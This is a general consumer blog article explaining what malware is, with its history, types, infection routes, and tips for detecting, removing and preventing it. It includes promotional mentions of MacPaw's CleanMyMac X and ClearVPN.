Security

What is malware? Definition, types, detection, and prevention

Dawna Roberts

Feb 26, 20247 min read

What is malware? Definition, types, detection and prevention: Header image

Malware has become the bane of every technology lover’s existence. Not only is it annoying, but it is also very damaging and can lead to severe consequences. These days, anyone who uses a computer or mobile device should learn all about malware, including how it works, what a malware infection looks like, and how to protect themselves. 

Continue reading to learn about malware. You’ll also learn some professional tips on how to rid your devices of malicious threats and prevent future infections.

What is malware?

Malware is malicious software that steals data, damages networks or systems, or holds information hostage for money. It is developed by cybercriminals (also known as hackers). Some examples of malware are adware, spyware, ransomware, viruses, worms, and trojans.

Why is malware dangerous?

Malware is dangerous because it disrupts our digital lives, destroys data, compromises hardware/software, and increases our vulnerability to other threats. Anytime your device is infected, it could expose your most personal information or sensitive secrets.

What does malware do?

Some malware spies on you, copying passwords and account information. Other types display pop-up ads. Still others destroy files or hold them for ransom in exchange for payment. And while some types of malware require direct intervention, others are self-replicating and can spread across networks in seconds.

The evolution of malware

Malware is a blanket term used to describe many types of digital attacks. The first malware was a virus known as Creeper, first seen in 1971, which spread across the United States Advanced Research Projects Agency Network (ARPANET), the first public computer network. 

The 80s saw many firsts, including the first Mac and PC viruses. In the late 1990s, several worms made trouble for computer owners, and by 1989, we saw the first signs of ransomware holding files hostage for money. 

Since then, the world has seen thousands of different types of attacks, each more sophisticated and damaging than the last. Cybersecurity experts struggle to keep up with the evolution of it.

What is a malware attack?

Digital attacks that use malware — meaning the attacker uses a type of software to carry out the attack — are extremely common. Malware attacks can vary, but the overall objective is typically financial gain. In other cases, the goal might be the destruction or theft of data to be used in identity theft. 

Real-world cases of malware attacks

We have seen many real-world cases of malware affecting thousands, if not millions, of users. Some extreme cases include the following.

ILOVEYOU worm

In early 2000, the ILOVEYOU worm infected more than 45 million people, costing $15 million in damages.

WannaCry ransomware

In 2017, WannaCry malware infected 230,000 computers — in a single day. It remains one of the costliest attacks in history, totaling $4 billion in ransomware losses.

Emotet trojan

The US Department of Homeland Security calls the Emotet trojan the most damaging malware attack to date. Emotet not only stole millions of dollars of sensitive financial information from government organizations worldwide but also resulted in additional spam and phishing attacks, costing an average of $1 million per incident. 

Types of malware

Each type of malware works slightly differently and is used for a specific purpose. The following are the most common types:

  • Virus: Viruses infect computers or mobile devices and destroy data, copy files, or ruin operating systems. 
  • Worm: Worms spread across networks without any user intervention, using up system resources.
  • Ransomware: Ransomware encrypts data, holding it hostage until the owner pays a ransom.
  • Trojan: Trojans pose as legitimate software, only to then run in the background, stealing data or taking remote control of a network. 
  • Spyware: Spyware is designed to spy on your online activities and report back to a central server or collect data for identity theft. 
  • Adware: Adware displays ads to the user, getting them to click links.
  • Keylogger: A keylogger copies keystrokes, usually with the aim of stealing login credentials for online accounts, banking info, or credit cards. 
  • Backdoor: A backdoor is a program that allows someone to break into a network at will. Backdoors are usually combined with other types of malware. 
  • Botnet: Botnets ensnare other devices into a network to perform functions usually used in conjunction with distributed denial-of-service attacks. 

Common malware infection methods

Threat actors have many different infection methods at their disposal. Most infections occur, however, simply due to user error. Therefore, many of these infection methods are avoidable if you follow cybersecurity best practices.

Phishing emails

The most common method of malware infection occurs through a phishing email where the user clicks a malicious link. At that point, their device becomes infected.

Fake websites

Sometimes, websites are infected, and if you visit them, your device could be affected by a drive-by attack. Hackers are experts at making these fake websites look authentic, tricking you into thinking you are on a legitimate site. 

Man-in-the-middle attacks

In a man-in-the-middle attack, bad actors steal information by positioning themselves between two sources of information. This is especially easy to do on unsecured public Wi-Fi networks. Every time you connect to an unsecured Wi-Fi network, you put yourself at risk of being infected, so never connect to an open network without using a VPN.

Downloading unsafe files

Downloading software or files from untrusted websites is never a good idea. Files from unverified third parties could be laced with malicious software, and you could infect your device that way. 

How to detect malware

As damaging as malicious software is, if you are diligent, you can detect and remove it early before suffering the consequences. Here are some ways to detect malware:

  • Run malware scans often using good antivirus/antimalware software.
  • Check your hard drive for suspicious files.
  • Regularly check your system settings to ensure that they are as you left them. 
  • Review account activity each month, looking for any suspicious activity. 
  • Check your router logs to see if they match your online activity. 
A screenshot of the macOS Activity Monitor.
Mac and macOS are trademarks of Apple Inc.

Possible signs of malware

Some possible malware symptoms include the following: 

  • Computer or device suffering from slowdown
  • Constant pop-ups
  • Hard drive filling up unexpectedly
  • Router logs showing excessive internet activity
  • BSOD (blue screen of death)
  • Suspicious changes to settings
  • Antivirus software turned off or not working 

How to check for malware on iPhone

Although finding malware on an iPhone is rare, it can happen, especially if you have a jailbroken operating system. You can check for malware by looking for any apps you don’t recognize, checking your data usage and power consumption, and scanning your phone with antivirus protection software. 

How to find malware on Mac

Macs have built-in protections against malware, but infections can still happen. The best way to find malware is to use a solid, reputable antivirus program designed to clean out infections. Also, check your Activity Monitor to see apps that are consuming resources, which could indicate an infection. 

How to remove malware

To get rid of malware, you must follow the instructions for your specific device, as the preferred method will vary depending on the device.

To remove malware on a Mac, follow these steps: 

  • Disconnect your Mac from the internet.
  • Reboot your Mac in Safe Mode.
  • Check the Activity Monitor for programs running in the background.
  • Run your antivirus software to find and remove the malware.
  • Remove any extensions from your internet browser and restore your settings.
  • Clear all caches.

Sometimes, the best way to thoroughly remove all malware is to factory reset the device or restore it from a safe backup. 

To remove malware from your Mac using MacPaw’s CleanMyMac X: 

  1. Open CleanMyMac X.
  2. On the left side, under the Smart Scan menu, choose Malware Removal.
  3. Use the Configure button to set how deep and how quickly you want to scan.
  4. The software will automatically detect and remove any malware found.
  5. Click Review Details to see what was found and removed.

Moonlock’s expert tips to prevent malware infection

Preventing a malware attack is much easier than cleaning up after one. Here are a few expert tips to help you prevent infections on all your devices:

  • Always keep your computer and devices updated with the latest security patches.
  • Never download apps or files from an untrusted source.
  • Do not click links in emails or text messages.
  • Never respond to pop-up messages or urgent emails pressuring you to visit a specific website.
  • Install good antivirus software on all your devices and run deep scans often.
  • Sign up for 2FA and MFA when available.
  • Never share your login credentials with anyone. 
  • Use a VPN like ClearVPN for additional protection. 
  • Educate yourself on all the possible threats and defend yourself with cybersecurity best practices. 

Malware is no minor annoyance. It is a dangerous threat to your digital security and should be treated as such. Fortunately, you can use the methods and safeguards above to keep all your devices clean and running smoothly. 

This is an independent publication, and it has not been authorized, sponsored, or otherwise approved by Apple Inc. iPhone, Mac, iOS, and macOS are trademarks of Apple Inc.

Dawna Roberts Dawna Roberts
Dawna has spent her entire career in web dev, cybersecurity, and IT. Her work has been featured on Forbes, Adobe, Airtable, Backblaze, Cyberleaf, Lifewire, and other online publications for the past ten years.